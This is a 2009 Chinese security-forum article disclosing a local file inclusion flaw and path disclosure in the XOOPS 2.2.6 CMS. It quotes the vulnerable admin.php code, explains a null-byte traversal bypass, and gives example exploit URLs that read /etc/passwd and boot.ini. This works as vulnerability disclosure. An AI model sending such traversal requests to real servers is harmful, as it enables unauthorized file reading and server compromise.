首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
XOOPS 2.2.6 鸡肋本地包含漏洞
来源:http://www.oldjun.com 作者:oldjun 发布时间:2009-10-30  

不经意的遇到这个国外的CMS系统:XOOPS 2.2.6,google了下,版本比较老了,没发现有什么已知漏洞,于是下源码自己看,还是没发现有啥可以利用了,只不过看到了几个鸡肋,于是发出来。

XOOPS is a web application platform written in PHP for the MySQL database.Its object orientation makes it an ideal tool for developing small or large community websites, intra company and corporate portals, weblogs and much more. (Reference : http://www.xoops.org).

1.Local File Inclusion Vulnerabilities:

/*
works with:
magic_quotes_gpc = Off
*/

现在能遇到这个php配置的,简直可以去买彩票了,所以够鸡肋的。

Local File Include vulnerability found in scripts:
modules/system/admin.php

看源码:

<?php
if (isset($_POST['fct'])) {
    
$fct trim($_POST['fct']);
}
if (isset(
$_GET['fct'])) {
    
$fct trim($_GET['fct']);
}
$xoopsOption['pagetype'] = "admin";
include 
"../../mainfile.php";
//利用时需要注册用户并登陆
if (!$xoopsUser) {
    
redirect_header(XOOPS_URL."/user.php"3_AD_NORIGHT);
}
include 
XOOPS_ROOT_PATH."/include/cp_functions.php";

include_once 
XOOPS_ROOT_PATH."/modules/system/constants.php";
$error false;
if (isset(
$fct) && $fct != '') {
    if (
file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {

        if (
file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
            include 
XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
        } elseif (
file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
            include 
XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php";
        }
        include 
XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
...
?>

If magic_quotes_gpc is disabled, it's possible to control the "$fct" variable content and inject an arbitrary filename (followed by a NULL byte (%00) to make file_exists() function ignore the
following "/xoops_version.php"), resulting in file content inclusion in application response.

构造fct,基本如果gpc为off,拿shell不成问题。

Example:
http://[server]/[installdir]/modules/system/admin.php?fct=../../../../../../../boot.ini%00
http://[server]/[installdir]/modules/system/admin.php?fct=../../../../../../../etc/passwd%00

2.路径泄露:

很多文件直接访问可以泄露路径:
/class/uploader.php
/class/theme.php

其实在gpc为off下,有第一个漏洞就可以拿下了,但gpc为off太难了,鸡肋鸡肋。

想说一下的是XOOPS系统整体还是很安全的,我看的这个版本已经够老的了,但安全却一点都没马虎,milw0rm上搜了下,XOOPS系统出问题的基本都是modules,各种模块可能有问题,但主系统却没~

现在的程序越来越安全了,大家有0day的藏着深深的,千万别透露出来...


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·中易广告联盟系统(ZYADS) sql注
·shopxp网购xpCatalog_xpDesc.asp
·Fckeditor 2.4.2 php版本上传文
·花马收信箱子Getshell 0day
·PunBB官方上传附件扩展注射漏洞
·睛天电影系统0DAY
·8603音乐网管理系统0day
·中易广告联盟系统(ZYADS) sql注
·discuz!NT 3.0 特殊环境下利用漏
·DEDECMS 5.1 feedback_js.php 0D
·科讯CMS文件名解析漏洞
·大榕树网络文章管理系统0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved